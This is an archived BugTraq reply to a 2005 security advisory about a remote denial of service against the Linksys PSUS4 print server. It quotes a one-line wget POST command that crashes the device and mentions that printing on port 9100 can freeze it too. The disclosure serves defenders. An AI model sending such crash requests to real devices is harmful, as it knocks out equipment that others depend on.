BugTraq
[ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4 Feb 03 2005 10:49PM
laurent oudot (oudot rstack org) (1 replies)
Re: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4 Feb 04 2005 01:20AM
Denis Jedig (seclists syneticon de)
laurent oudot wrote:

> Background
> ==========
>
> PSUS4 is one of the small embedded Linksys wired print servers.
>
> Affected products
> =================
>
> Model Name: PSUS4 (not tested against others)
> Firmware Version: 6032 (not tested against others)
>
> Description
> ===========
>
> Here is an example, to crash a remote PSUS4 :
>
> $ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
> [...]
> => And the PSUS4 is crashed.

Well, if you want a more complicated way, just try to print a page
through the SMP (tcp/9100) - it will occasionally freeze the print
server as well.

The firmware seems not to be very mature, I'd bet that we could expect
more serious vulnerabilities from it.

Denis

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus